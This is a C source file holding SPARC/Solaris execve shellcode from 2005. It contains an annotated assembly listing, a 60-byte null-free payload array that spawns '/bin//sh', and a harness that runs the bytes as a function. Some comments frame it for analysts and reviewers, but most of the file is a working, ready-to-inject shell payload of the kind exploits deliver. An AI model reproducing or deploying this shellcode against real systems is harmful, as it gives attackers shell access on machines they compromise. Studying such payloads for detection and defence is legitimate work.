/*******************************************************************
(nitrous@fight:~/shellc0ding$)uname -a
SunOS fight 5.9 Generic_112233-10 sun4u sparc SUNW,Ultra-2 Solaris
(nitrous@fight:~/shellc0ding$)cat execve-nitrous.s
! execve("/bin//sh") SPARC/Solaris Shellc0de
!
!   --=[ n i t r o u s ]=--
! nitrous[at]danitrous[dot]org
!
! 08 / 04 / 2005 - Mexico

! Entry point. Builds the path string and the argv array in scratch space
! just below %sp, issues the execve trap, and falls through to the exit
! trap if execve returns.
!   %l0:%l1  the eight path bytes "/bin//sh" (the doubled slash pads the
!            path to exactly two 32-bit words)
!   %o0      argument 1: address of the path string        (%sp - 16)
!   %o1      argument 2: address of argv = { path, NULL }  (%sp - 24)
!   %o2      argument 3: envp = NULL
!   %g1      system call number read by "ta 0x8"
! %sp itself is never adjusted; every store uses a negative offset from it.
! Analyst note: argv[0] points at the same string as the path, so the
! spawned shell appears in process and audit records as "/bin//sh",
! doubled slash included.
.globl  _start
_start:
        set     0x2f62696e, %l0         ! %l0 = '/bin' (first half of the path)
        set     0x2f2f7368, %l1         ! %l1 = '//sh' (second half of the path)
        std     %l0, [ %sp - 16 ]       ! store the %l0/%l1 pair (8 bytes) at %sp-16
        clr     [ %sp - 8 ]             ! zero word at %sp-8 terminates the string
        sub     %sp, 0x10, %o0          ! %o0 = %sp-16 = address of "/bin//sh" [first argument]
        st      %o0, [ %sp - 24 ]       ! argv[0] = address of "/bin//sh", stored at %sp-24
        clr     [ %sp - 20 ]            ! argv[1] = NULL, ends the argv array
        sub     %sp, 0x18, %o1          ! %o1 = %sp-24 = address of argv [second argument]
        xor     %o2, %o2, %o2           ! %o2 = 0, envp = NULL [third argument]
        mov     0x3b, %g1               ! 0x3b = SYS_execve()
        ta      0x8                     ! execve("/bin//sh",{"/bin//sh",NULL},NULL)

        mov     0x1, %g1                ! 0x1 = SYS_exit(), reached only if execve() returns
        ta      0x8                     ! exit()

! THE STACK ...
! |@'/bin//sh'| NULL | "/bin//sh" |  NULL  |       |%sp
! |    -24    | -20  |    -16     |   -8   |   -4  |
!<- 4 bytes - 4 bytes - 8 bytes - 4 bytes - 4 bytes|

**********************************************************************/

/*
 * Assembled form of the _start listing above: 15 four-byte SPARC instruction
 * words (60 bytes) plus the string literal's implicit terminator. None of the
 * 60 payload bytes is 0x00. One word per line, in listing order; each `set`
 * in the listing assembles to a sethi/or pair.
 *
 * Signature material for analysts: the immediates spelling "/bin" and "//sh"
 * and the trap word 91 d0 20 08, which occurs twice.
 */
char sparc_execve[] =
	"\x21\x0b\xd8\x9a"	/* sethi %hi(0x2f62696e), %l0               */
	"\xa0\x14\x21\x6e"	/* or    %l0, 0x16e, %l0    %l0 = "/bin"    */
	"\x23\x0b\xcb\xdc"	/* sethi %hi(0x2f2f7368), %l1               */
	"\xa2\x14\x63\x68"	/* or    %l1, 0x368, %l1    %l1 = "//sh"    */
	"\xe0\x3b\xbf\xf0"	/* std   %l0, [%sp - 16]    path string     */
	"\xc0\x23\xbf\xf8"	/* clr   [%sp - 8]          terminator      */
	"\x90\x23\xa0\x10"	/* sub   %sp, 0x10, %o0     arg 1: path     */
	"\xd0\x23\xbf\xe8"	/* st    %o0, [%sp - 24]    argv[0]         */
	"\xc0\x23\xbf\xec"	/* clr   [%sp - 20]         argv[1] = NULL  */
	"\x92\x23\xa0\x18"	/* sub   %sp, 0x18, %o1     arg 2: argv     */
	"\x94\x1a\x80\x0a"	/* xor   %o2, %o2, %o2      arg 3: NULL     */
	"\x82\x10\x20\x3b"	/* mov   0x3b, %g1          SYS_execve      */
	"\x91\xd0\x20\x08"	/* ta    0x8                                */
	"\x82\x10\x20\x01"	/* mov   0x1, %g1           SYS_exit        */
	"\x91\xd0\x20\x08";	/* ta    0x8                                */

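/*
 * Test harness: prints the payload length, then transfers control to the
 * sparc_execve byte array as if it were a function.
 *
 * Returns 0 if the call comes back. Per the listing in the header comment
 * the payload ends in execve or exit, so a return is not expected.
 *
 * NOTE(review): sparc_execve lives in writable data. Where data pages are
 * mapped non-executable, the indirect call below faults instead of running.
 * NOTE(review): this file includes no headers, so printf relies on an
 * implicit declaration; add #include <stdio.h> at the top of the file.
 */
int main(void)
{
	/* Reinterpret the data array as a function taking no arguments. */
	void (*f00)(void) = (void (*)(void)) sparc_execve;

	/*
	 * sizeof - 1 is the exact payload length (array size minus the string
	 * literal's terminator); strlen() would stop at the first 0x00 byte.
	 * The size_t value is cast to match %lu; the original passed it to %d,
	 * a type mismatch wherever size_t is wider than int.
	 */
	printf("Shellcode size: %lu bytes\n",
	       (unsigned long)(sizeof(sparc_execve) - 1));
	f00();
	return 0;
}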
